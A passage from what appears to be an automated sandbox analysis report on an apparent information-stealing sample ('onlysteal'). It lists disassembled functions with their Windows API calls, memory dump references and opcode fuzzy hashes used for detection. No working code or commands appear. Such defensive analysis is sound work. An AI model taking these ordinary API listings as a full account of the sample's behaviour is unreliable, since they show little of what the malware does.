                                      • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0024AF35
                                      • GetNumberFormatW.KERNEL32(00000400,00000000,?,0026E72C,?,?), ref: 0024AF84
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: FormatInfoLocaleNumber
                                      • String ID:
                                      • API String ID: 2169056816-0
                                      • Opcode ID: 2d1e1e6fec88bd799c67fc7df3cfe18e356565e1cfad68907fab05a2c6520cfe
                                      • Instruction ID: 24a4fc477895725998bfd67d8b631224d12b503b4cb862cb12fdbf4302be79a1
                                      • Opcode Fuzzy Hash: 2d1e1e6fec88bd799c67fc7df3cfe18e356565e1cfad68907fab05a2c6520cfe
                                      • Instruction Fuzzy Hash: D601713A150308AADB11DF64EC49F9A77BCEF09710F408022FA05A7190D3709A24CBA5
                                      Function 00236C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(00236DDF,00000000,00000400), ref: 00236C74
                                      • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00236C95
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ErrorFormatLastMessage
                                      • String ID:
                                      • API String ID: 3479602957-0
                                      • Opcode ID: 93419c3ca9bb2665c0dfd990abe75ad4d791e2646206ceb3fc0cc6be98cb78a1
                                      • Instruction ID: 023833cd79c11a51981908dd1bf1ba36be93a09e40e90fe5df8371359254cee4
                                      • Opcode Fuzzy Hash: 93419c3ca9bb2665c0dfd990abe75ad4d791e2646206ceb3fc0cc6be98cb78a1
                                      • Instruction Fuzzy Hash: 09D0A970348300BFFA000F219C0EF2A3B9CBF40B41F18C804B380E80E0CBB18438A628
                                      Function 002619F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,002619EF,?,?,00000008,?,?,0026168F,00000000), ref: 00261C21
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID:
                                      • API String ID: 3997070919-0
                                      • Opcode ID: 44a06f0e481cf3b639172ac88dbdf83a1cc579e8a2e0b3d81e9d912c723f6f16
                                      • Instruction ID: f3df15cdb1220d29b9e3e6e3d2ec39ba87d4b21d99f270ab6197ae9cfb1e6da4
                                      • Opcode Fuzzy Hash: 44a06f0e481cf3b639172ac88dbdf83a1cc579e8a2e0b3d81e9d912c723f6f16
                                      • Instruction Fuzzy Hash: D9B16E31620609DFD719CF28C48AB697BE0FF45364F298659E899CF2A1C335EDA1CB40
                                      Function 0024F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                      Download Yara Rule
                                      APIs
                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0024F66A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: FeaturePresentProcessor
                                      • String ID:
                                      • API String ID: 2325560087-0
                                      • Opcode ID: 585b2820edc2c8543d8ed2be49eafc002ededa5440c12e81d1036330584d5c91
                                      • Instruction ID: 258688709705c8ed7d6615350f6d202496d620ed5a1903c15fe7f24ec3671f1f
                                      • Opcode Fuzzy Hash: 585b2820edc2c8543d8ed2be49eafc002ededa5440c12e81d1036330584d5c91
                                      • Instruction Fuzzy Hash: 9C5180719106068FEB59CF99EA857AAF7F4FB88314F25893AD401EB350D3749D10CBA0
                                      Function 0023B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 0023B16B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Version
                                      • String ID:
                                      • API String ID: 1889659487-0
                                      • Opcode ID: 0f713c2bc1462738284a770b4e1c4b387605fddcd610aee72c41ca53b063421a
                                      • Instruction ID: 61a5686768f2e1be5fd88d5878d91f936cf7effd77b8dc272deea4c666ad16b6
                                      • Opcode Fuzzy Hash: 0f713c2bc1462738284a770b4e1c4b387605fddcd610aee72c41ca53b063421a
                                      • Instruction Fuzzy Hash: 19F03AB8E102088FDB18CF18FCAA6E973F1FB88315F104295DA1993390D3B0A9D48E64
                                      Function 002340FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: gj
                                      • API String ID: 0-4203073231
                                      • Opcode ID: 5ac20afc28240edb85ba37dda14c8a8aba71fe19086bbaca7a8feacf1cc8bebd
                                      • Instruction ID: af77c6bbdd2d020c0fdb9e5c6f82179ade9b23f60021081fa3bf982afae31085
                                      • Opcode Fuzzy Hash: 5ac20afc28240edb85ba37dda14c8a8aba71fe19086bbaca7a8feacf1cc8bebd
                                      • Instruction Fuzzy Hash: 2EC127B6A183418FC354CF29D880A5AFBE1BFC8308F19892DE998D7311D734E955CB96
                                      Function 0024F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0024F3A5), ref: 0024F9DA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: f9fff082e5621cb62b8ca4619b423f84469440cbcd206f88f68b2844091d4313
                                      • Instruction ID: d88594f71a3d22f1bce6a1b55f67bec55b695d81473332900eba8379e2a68fcd
                                      • Opcode Fuzzy Hash: f9fff082e5621cb62b8ca4619b423f84469440cbcd206f88f68b2844091d4313
                                      • Instruction Fuzzy Hash:
                                      Function 0025C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: HeapProcess
                                      • String ID:
                                      • API String ID: 54951025-0
                                      • Opcode ID: 19a9e9bd63bff6d6186d168dc1daf31dc1cf9a8c04bec1ccb2b02c14caea5d1e
                                      • Instruction ID: b401809302c28779fa9055f8705700bf37faf38b839e27a653302c035da7bbf9
                                      • Opcode Fuzzy Hash: 19a9e9bd63bff6d6186d168dc1daf31dc1cf9a8c04bec1ccb2b02c14caea5d1e
                                      • Instruction Fuzzy Hash: 1BA00171602201EB9744CF35BE4D6493AA9AA5669170980AAA50DC55A0EA6485A8AA01
                                      Function 002462CA Relevance: .8, Instructions: 829COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                      • Instruction ID: b6dd43435103a024d544a0fb553f08a25fcdaa80ae6fcae99ca19d2375f87001
                                      • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                      • Instruction Fuzzy Hash: 21620A716147859FCB29CF28C4946B9BBE1BF96304F08C96ED8DA8B342D730E955CB12
                                      Function 002477EF Relevance: .8, Instructions: 817COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                      • Instruction ID: 6caa43d6a76aa316ed296e177b04fc9b3e4f12b0b7cfe141bc29a7f65448a1eb
                                      • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                      • Instruction Fuzzy Hash: 7E62FB7162C3458FCB19CF28C8806B9BBE1BF95304F18896DECAA8B346D770E955CB15
                                      Function 0023F461 Relevance: .7, Instructions: 694COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                      • Instruction ID: f6d4a4b2b858fc122e281be66293fb7883fd0872426f7dfd58857ee320dbb661
                                      • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                      • Instruction Fuzzy Hash: D1523B72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE59597255D334EA19CB86
                                      Function 00247153 Relevance: .5, Instructions: 536COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 94c86917fd8b6335d4503316febc97662c5ff378af249632e1e0ac6e6f043030
                                      • Instruction ID: 071cb96b022bd1a8a90b5941fe06e15b463e655edcadc2a68c092ab402836d14
                                      • Opcode Fuzzy Hash: 94c86917fd8b6335d4503316febc97662c5ff378af249632e1e0ac6e6f043030
                                      • Instruction Fuzzy Hash: 4E12C3B16287069FC72CCF28C490A79B7E1FF94304F50492EE9A6C7781D374A9A5CB45
                                      Function 0023C426 Relevance: .5, Instructions: 454COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 523aa7ef74bc688a96aee42a301b9e871bab7c06b688151adc7b6ea4139fb798
                                      • Instruction ID: b6380bda0c03a711a95d11f7955317bb6d6e2518de1b72c06bc37c63e179c666
                                      • Opcode Fuzzy Hash: 523aa7ef74bc688a96aee42a301b9e871bab7c06b688151adc7b6ea4139fb798
                                      • Instruction Fuzzy Hash: CDF19CB16283028FC718CF29C58862ABBE9EFC9314F254A2EF4C5A7355D630E955CF46
                                      Function 00246CDC Relevance: .3, Instructions: 343COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 0a6b5905d89823e50bab0cff1e4de5301f81a2fe6d59c77cd1ec3948b1a78fba
                                      • Instruction ID: 8cb7b003e5baa4ca22a7c18966f93ffe7f7f6a3397946f3326d96c75f924115a
                                      • Opcode Fuzzy Hash: 0a6b5905d89823e50bab0cff1e4de5301f81a2fe6d59c77cd1ec3948b1a78fba
                                      • Instruction Fuzzy Hash: 0ED1C9B1A183418FDB18CF28C88475BBBE1BF89308F04456DE8999B342D774E929CB57
                                      Function 0023E9B7 Relevance: .3, Instructions: 320COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5044663825abfda298fdb72be3782c563d32154f9781b54685049d4892831647
                                      • Instruction ID: 7bcef6d83454ceb7541b0063f718f80bf8dd1fe921a3ce1e2bcc089ebf03a8c8
                                      • Opcode Fuzzy Hash: 5044663825abfda298fdb72be3782c563d32154f9781b54685049d4892831647
                                      • Instruction Fuzzy Hash: 32E16C755193908FC304CF29E88486AFFF1AF9A300F45095EF9C897392C235EA59DB92
                                      Function 00244088 Relevance: .3, Instructions: 270COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                      • Instruction ID: 73b5ade62f6ad5e3670659ea1083ce0b87607a4c4173cf38f2b4841212c1b1e1
                                      • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                      • Instruction Fuzzy Hash: 5A916AB02203468BD72CFF64D895BBA77D8FB90304F10092DF99A87282DAB49565CB52
                                      Function 002443BF Relevance: .2, Instructions: 243COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                      • Instruction ID: 7a537127be1ec01c2cd12312663a26eec1b3030d04409e13d6dd724c0e3669f3
                                      • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                      • Instruction Fuzzy Hash: EE8150B17243464BDF2DFF68C8D1BBD77D4ABA4304F40093DE9C68B182DA7099A58752
                                      Function 002551C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 373f6057a468bc8e9902d97c57b245062713886b6c4a2f199c913cb9ec554eb9
                                      • Instruction ID: e6d9ff9fedc7576517e7b8c6dd5942fb57b7aa72fd40f72c5d7f906db5807d17
                                      • Opcode Fuzzy Hash: 373f6057a468bc8e9902d97c57b245062713886b6c4a2f199c913cb9ec554eb9
                                      • Instruction Fuzzy Hash: A8617631A30F3A66DA389D6898B57BE2394AB41343F140519EC46DF281D2B1DCAE870D
                                      Function 00254F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
